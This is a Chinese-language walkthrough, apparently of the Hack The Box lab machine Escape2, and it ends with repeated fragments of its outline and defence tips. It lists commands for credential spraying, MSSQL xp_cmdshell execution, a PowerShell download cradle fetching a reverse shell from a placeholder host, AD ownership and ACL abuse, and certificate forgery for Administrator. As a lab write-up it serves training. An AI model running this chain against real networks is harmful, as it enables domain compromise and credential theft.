HTB Escape2 渗透测试详细教学文档<\/h1>

1. 初始信息收集与扫描<\/h2>

1.1 网络扫描<\/h3>

使用nmap进行初始扫描，发现开放的服务：<\/p>

MSSQL (Microsoft SQL Server)<\/li>

LDAP (轻量级目录访问协议)<\/li> <\/ul>

nmap -sV -sC -p- 10.10.11.51
<\/span><\/span><\/code><\/pre>1.2 域名解析<\/h3>
根据扫描结果，添加域名解析到本地hosts文件：<\/p>
10.10.11.51 sequel.htb DC01.sequel.htb
<\/code><\/pre>
2. 凭证爆破与枚举<\/h2>
2.1 用户名爆破<\/h3>
使用提供的用户名和密码进行爆破：<\/p>
crackmapexec mssql 10.10.11.51 -u users.txt -p passwords.txt
<\/span><\/span><\/code><\/pre>2.2 SMB共享枚举<\/h3>
将爆破得到的有效用户名加入user.txt，检查SMB共享服务：<\/p>
smbclient -L \/\/10.10.11.51 -U username
<\/span><\/span><\/code><\/pre>2.3 下载共享文件<\/h3>
发现共享文件后下载：<\/p>
smbget -R smb:\/\/10.10.11.51\/sharename -U username
<\/span><\/span><\/code><\/pre>3. MSSQL数据库利用<\/h2>
3.1 连接MSSQL<\/h3>
使用获得的凭证连接MSSQL：<\/p>
sqsh -S 10.10.11.51 -U username -P password
<\/span><\/span><\/code><\/pre>3.2 命令执行<\/h3>
在MSSQL中执行系统命令：<\/p>
EXEC<\/span> xp_cmdshell 'whoami'<\/span>;
<\/span><\/span><\/code><\/pre>3.3 反弹Shell<\/h3>
通过MSSQL获取反向Shell：<\/p>
EXEC<\/span> xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http:\/\/your-ip\/shell.ps1'')"'<\/span>
<\/span><\/span><\/code><\/pre>4. 横向移动<\/h2>
4.1 凭证收集<\/h3>
在系统中查找更多凭证：<\/p>
findstr \/si password *.txt *.xml *.config
<\/span><\/span><\/code><\/pre>4.2 使用新凭证枚举<\/h3>
使用新发现的凭证进行二次枚举：<\/p>
crackmapexec smb 10.10.11.51 -u new_users.txt -p new_passwords.txt
<\/span><\/span><\/code><\/pre>4.3 WinRM访问<\/h3>
使用有效凭证通过WinRM登录：<\/p>
evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'<\/span>
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 BloodHound信息收集<\/h3>
使用BloodHound收集域信息：<\/p>
bloodhound-python -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'<\/span> -ns 10.10.11.51 -c All
<\/span><\/span><\/code><\/pre>5.2 WriteOwner权限利用<\/h3>
发现ryan对ca_svc有WriteOwner权限，修改所有者：<\/p>
pipx run bloodyAD --host DC01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'<\/span> set owner ca_svc ryan
<\/span><\/span><\/code><\/pre>5.3 授予完全控制权限<\/h3>
使用impacket-dacledit授予完全控制权限：<\/p>
impacket-dacledit -action write -rights FullControl -principal 'ryan'<\/span> -target ca_svc sequel.htb\/ryan:WqSZAF6CysDQbGb3
<\/span><\/span><\/code><\/pre>6. 证书攻击<\/h2>
6.1 时间同步<\/h3>
确保本地时间与目标服务器同步：<\/p>
ntpdate 10.10.11.51
<\/span><\/span><\/code><\/pre>6.2 影子证书攻击<\/h3>
使用certipy-ad进行影子证书攻击：<\/p>
pipx run certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3'<\/span> -dc-ip 10.10.11.51 -ns 10.10.11.51 -target DC01.sequel.htb -account ca_svc
<\/span><\/span><\/code><\/pre>设置Kerberos票据环境变量：<\/p>
export KRB5CCNAME=<\/span>ca_svc.ccache
<\/span><\/span><\/code><\/pre>6.3 查找易受攻击的证书模板<\/h3>
pipx run certipy-ad find -debug -stdout -vulnerable -scheme ldap -k -target DC01.sequel.htb -dc-ip 10.10.11.51
<\/span><\/span><\/code><\/pre>检查特定模板是否适用：<\/p>
pipx run certipy-ad template -k -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51
<\/span><\/span><\/code><\/pre>6.4 请求伪造证书<\/h3>
为域管理员请求伪造证书：<\/p>
pipx run certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51
<\/span><\/span><\/code><\/pre>6.5 使用伪造证书认证<\/h3>
pipx run certipy-ad auth -pfx .\/administrator_10.pfx -dc-ip 10.10.11.51
<\/span><\/span><\/code><\/pre>7. 获取域管理员权限<\/h2>
7.1 使用evil-winrm登录<\/h3>
evil-winrm -i 10.10.11.51 -u Administrator -H [<\/span>NTLM_HASH]<\/span>
<\/span><\/span><\/code><\/pre>7.2 获取flag<\/h3>
在域控制器上查找flag文件：<\/p>
type C:\U<\/span>sers\A<\/span>dministrator\D<\/span>esktop\r<\/span>oot.txt
<\/span><\/span><\/code><\/pre>工具清单<\/h2>


扫描与枚举工具<\/strong>:<\/p>

nmap<\/li>
crackmapexec<\/li>
smbclient\/smbget<\/li>
<\/ul>
<\/li>

数据库工具<\/strong>:<\/p>

sqsh (MSSQL客户端)<\/li>
<\/ul>
<\/li>

横向移动工具<\/strong>:<\/p>

evil-winrm<\/li>
impacket工具集<\/li>
<\/ul>
<\/li>

AD枚举与攻击工具<\/strong>:<\/p>

BloodHound<\/li>
bloodyAD<\/li>
certipy-ad<\/li>
<\/ul>
<\/li>

其他工具<\/strong>:<\/p>

pipx (Python应用运行器)<\/li>
findstr (Windows命令)<\/li>
<\/ul>
<\/li>
<\/ol>
关键点总结<\/h2>

初始访问<\/strong>：通过MSSQL命令执行获取初始立足点<\/li>
凭证收集<\/strong>：从SMB共享和系统文件中收集更多凭证<\/li>
权限提升<\/strong>：利用BloodHound识别WriteOwner权限路径<\/li>
证书攻击<\/strong>：通过证书模板漏洞伪造域管理员证书<\/li>
最终控制<\/strong>：使用伪造证书获取域管理员权限<\/li>
<\/ol>
防御建议<\/h2>

限制MSSQL的xp_cmdshell执行权限<\/li>
定期审计AD证书模板配置<\/li>
监控WriteOwner等敏感权限变更<\/li>
实施SMB共享文件的严格访问控制<\/li>
启用LDAP签名和加密<\/li>
<\/ol>

HTB Escape2 渗透测试详细教学文档<\/h1>

1. 初始信息收集与扫描<\/h2>

2. 凭证爆破与枚举<\/h2>

3. MSSQL数据库利用<\/h2>

4. 横向移动<\/h2>

5. 权限提升<\/h2>

6. 证书攻击<\/h2>

7. 获取域管理员权限<\/h2>

防御建议<\/h2> 限制MSSQL的xp_cmdshell执行权限<\/li> 定期审计AD证书模板配置<\/li> 监控WriteOwner等敏感权限变更<\/li> 实施SMB共享文件的严格访问控制<\/li> 启用LDAP签名和加密<\/li> <\/ol>

防御建议<\/h2>

限制MSSQL的xp_cmdshell执行权限<\/li>
定期审计AD证书模板配置<\/li>
监控WriteOwner等敏感权限变更<\/li>
实施SMB共享文件的严格访问控制<\/li>
启用LDAP签名和加密<\/li> <\/ol>